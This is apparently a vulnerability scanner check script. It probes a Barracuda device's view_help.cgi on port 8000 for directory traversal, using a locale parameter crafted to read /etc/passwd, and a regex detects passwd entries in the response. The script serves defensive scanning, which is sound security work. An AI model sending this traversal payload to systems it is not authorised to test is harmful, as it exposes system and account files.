#include helpers.inc;
#include classMatches.inc;
// **************************************************************************************							 
function alert(fname, matchedText)
{	
	var ri = new TReportItem();
	ri.LoadFromFile(fname);
	ri.affects = "Web Server";
	ri.alertPath = "Scripts/" + fname; 	
		
	ri.setHttpInfo(lastJob);
	
	if (matchedText) 
		ri.Details =  ri.Details + "[break]Pattern found: [pre][blue]" + matchedText + "[/blue][/pre]";	
	
	AddReportItem(ri);	
}							 
// **************************************************************************************							 
function request(uri)
{
	lastJob = new THTTPJob();
	
	newUrl = scanURL;
	newUrl.port = 8000;		
		
	lastJob.timeout = 10000;
	lastJob.retries = 0;		
	lastJob.url = newUrl;
	lastJob.addCookies = false;
	lastJob.verb = 'GET';
	lastJob.URI = uri;
	lastJob.execute();
	
	if (!lastJob.wasError && lastJob.response.msg2 == 200)
	{
		return true;
	}	
	
	return false;
}
// **************************************************************************************
function Test1()
{
	var urls = [
					"/cgi-mod/view_help.cgi?locale=/..//../..//../..//../..//../..//etc/passwd"
				];
	
	matches.plainArray = [
						];
	
	matches.regexArray = [
						/((root|bin|daemon|sys|sync|games|man|mail|news|www-data|uucp|backup|list|proxy|gnats|nobody|syslog|mysql|bind|ftp|sshd|postfix):[\d\w-\s,]+:\d+:\d+:[\w-_\s,]*:[\w-_\s,\/]*:[\w-_,\/]*[\r\n])/
					  ];
	
	for (var i=0;i<urls.length;i++)
	{
		if (request(urls[i]))
		{
			var matchedText = matches.searchOnText(lastJob.response.body);	
			
			if (matchedText)
				alert("Barracuda_locale_Directory_Traversal.xml", matchedText); 	
		}
	}
}
// **************************************************************************************	
function startTesting()
{
	Test1();
}
/***********************************************************************************/
/* main entry point */
var matches = new classMatches();
var lastJob = null;
startTesting();
